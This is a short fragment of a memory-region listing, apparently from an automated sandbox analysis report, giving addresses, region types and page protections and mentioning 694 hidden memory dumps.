page read and write
|
||
|
1E1676FF000
|
heap
|
page read and write
|
||
|
140B000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C9D000
|
trusted library allocation
|
page read and write
|
||
|
28FCBBA9000
|
heap
|
page read and write
|
There are 694 hidden memdumps, click here to show them.